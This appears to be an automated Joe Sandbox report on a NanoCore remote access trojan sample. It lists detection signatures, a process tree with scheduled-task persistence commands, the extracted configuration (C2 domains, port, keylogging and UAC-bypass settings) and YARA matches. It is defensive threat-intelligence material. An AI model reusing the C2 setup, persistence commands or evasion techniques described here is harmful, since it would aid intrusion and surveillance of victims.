Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
004349256789197.pdf.scr.exe

Overview

General Information

Sample Name:004349256789197.pdf.scr.exe
Analysis ID:798041
MD5:3ac05bbe35293fbfd0df49ecfb34c461
SHA1:ee12d93ac5f81036e920bb8c05638aa4e6c1f3bf
SHA256:576263fb3c88934ebdb0aa6071f3a980710c9dfd2a3d63d09b0aa76f1caac9e7
Tags:exe
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Starts an encoded Visual Basic Script (VBE)
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query the security center for anti-virus and firewall products
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

  • System is w10x64
  • 004349256789197.pdf.scr.exe (PID: 912 cmdline: C:\Users\user\Desktop\004349256789197.pdf.scr.exe MD5: 3AC05BBE35293FBFD0DF49ECFB34C461)
    • wscript.exe (PID: 5348 cmdline: "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • ihgsvw.exe (PID: 5624 cmdline: "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx MD5: 797174324A2A71F55AD4E89DA918B52D)
        • RegSvcs.exe (PID: 3008 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
          • schtasks.exe (PID: 4524 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 5040 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 5116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • ihgsvw.exe (PID: 5040 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
            • RegSvcs.exe (PID: 1724 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • RegSvcs.exe (PID: 3784 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 3956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ihgsvw.exe (PID: 2200 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
    • RegSvcs.exe (PID: 2756 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 5176 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 2220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 1840 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ihgsvw.exe (PID: 5948 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
      • RegSvcs.exe (PID: 2884 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 2344 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 3384 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ihgsvw.exe (PID: 2788 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
      • RegSvcs.exe (PID: 5632 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • ihgsvw.exe (PID: 5648 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
    • RegSvcs.exe (PID: 4588 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 5884 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ihgsvw.exe (PID: 5304 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
      • RegSvcs.exe (PID: 4768 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
  • 0xfcc5:$x1: NanoCore.ClientPluginHost
  • 0x2c465:$x1: NanoCore.ClientPluginHost
  • 0xfd02:$x2: IClientNetworkHost
  • 0x2c4a2:$x2: IClientNetworkHost
  • 0x13835:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x2ffd5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfa2d:$a: NanoCore
    • 0xfa3d:$a: NanoCore
    • 0xfc71:$a: NanoCore
    • 0xfc85:$a: NanoCore
    • 0xfcc5:$a: NanoCore
    • 0x2c1cd:$a: NanoCore
    • 0x2c1dd:$a: NanoCore
    • 0x2c411:$a: NanoCore
    • 0x2c425:$a: NanoCore
    • 0x2c465:$a: NanoCore
    • 0xfa8c:$b: ClientPlugin
    • 0xfc8e:$b: ClientPlugin
    • 0xfcce:$b: ClientPlugin
    • 0x2c22c:$b: ClientPlugin
    • 0x2c42e:$b: ClientPlugin
    • 0x2c46e:$b: ClientPlugin
    • 0xfbb3:$c: ProjectData
    • 0x2c353:$c: ProjectData
    • 0x105ba:$d: DESCrypto
    • 0x2cd5a:$d: DESCrypto
    • 0x17f86:$e: KeepAlive
    00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
    • 0xfcc5:$a1: NanoCore.ClientPluginHost
    • 0x2c465:$a1: NanoCore.ClientPluginHost
    • 0xfc85:$a2: NanoCore.ClientPlugin
    • 0x2c425:$a2: NanoCore.ClientPlugin
    • 0x11bde:$b1: get_BuilderSettings
    • 0x2e37e:$b1: get_BuilderSettings
    • 0xfae1:$b2: ClientLoaderForm.resources
    • 0x2c281:$b2: ClientLoaderForm.resources
    • 0x112fe:$b3: PluginCommand
    • 0x2da9e:$b3: PluginCommand
    • 0xfcb6:$b4: IClientAppHost
    • 0x2c456:$b4: IClientAppHost
    • 0x1a136:$b5: GetBlockHash
    • 0x368d6:$b5: GetBlockHash
    • 0x12236:$b6: AddHostEntry
    • 0x2e9d6:$b6: AddHostEntry
    • 0x15f29:$b7: LogClientException
    • 0x326c9:$b7: LogClientException
    • 0x121a3:$b8: PipeExists
    • 0x2e943:$b8: PipeExists
    • 0xfcef:$b9: IClientLoggingHost
    00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
    • 0xffad:$x1: NanoCore.ClientPluginHost
    • 0xffea:$x2: IClientNetworkHost
    • 0x13b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Click to see the 258 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    29.3.ihgsvw.exe.133eea0.1.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    29.3.ihgsvw.exe.133eea0.1.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth (Nextron Systems)
    • 0xff05:$x1: NanoCore Client.exe
    • 0x1018d:$x2: NanoCore.ClientPluginHost
    • 0x117c6:$s1: PluginCommand
    • 0x117ba:$s2: FileCommand
    • 0x1266b:$s3: PipeExists
    • 0x18422:$s4: PipeCreated
    • 0x101b7:$s5: IClientLoggingHost
    29.3.ihgsvw.exe.133eea0.1.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      29.3.ihgsvw.exe.133eea0.1.raw.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
      • 0xfef5:$x1: NanoCore Client
      • 0xff05:$x1: NanoCore Client
      • 0x1014d:$x2: NanoCore.ClientPlugin
      • 0x1018d:$x3: NanoCore.ClientPluginHost
      • 0x10142:$i1: IClientApp
      • 0x10163:$i2: IClientData
      • 0x1016f:$i3: IClientNetwork
      • 0x1017e:$i4: IClientAppHost
      • 0x101a7:$i5: IClientDataHost
      • 0x101b7:$i6: IClientLoggingHost
      • 0x101ca:$i7: IClientNetworkHost
      • 0x101dd:$i8: IClientUIHost
      • 0x101eb:$i9: IClientNameObjectCollection
      • 0x10207:$i10: IClientReadOnlyNameObjectCollection
      • 0xff54:$s1: ClientPlugin
      • 0x10156:$s1: ClientPlugin
      • 0x1064a:$s2: EndPoint
      • 0x10653:$s3: IPAddress
      • 0x1065d:$s4: IPEndPoint
      • 0x12093:$s6: get_ClientSettings
      • 0x12637:$s7: get_Connected
      29.3.ihgsvw.exe.133eea0.1.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xfef5:$a: NanoCore
      • 0xff05:$a: NanoCore
      • 0x10139:$a: NanoCore
      • 0x1014d:$a: NanoCore
      • 0x1018d:$a: NanoCore
      • 0xff54:$b: ClientPlugin
      • 0x10156:$b: ClientPlugin
      • 0x10196:$b: ClientPlugin
      • 0x1007b:$c: ProjectData
      • 0x10a82:$d: DESCrypto
      • 0x1844e:$e: KeepAlive
      • 0x1643c:$g: LogClientMessage
      • 0x12637:$i: get_Connected
      • 0x10db8:$j: #=q
      • 0x10de8:$j: #=q
      • 0x10e04:$j: #=q
      • 0x10e34:$j: #=q
      • 0x10e50:$j: #=q
      • 0x10e6c:$j: #=q
      • 0x10e9c:$j: #=q
      • 0x10eb8:$j: #=q
      Click to see the 350 entries

      Sigma Signatures

      AV Detection

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 3008, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 3008, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Persistence and Installation Behavior

      barindex
      Sigma detected: Scheduled temp file as task from temp location
      Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, ParentImage: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentProcessId: 3008, ParentProcessName: RegSvcs.exe, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp, ProcessId: 4524, ProcessName: schtasks.exe

      Stealing of Sensitive Information

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 3008, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 3008, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: december2nd.ddns.netAvira URL Cloud: Label: malware
      Source: december2n.duckdns.orgAvira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeAvira: detection malicious, Label: DR/AutoIt.Gen
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
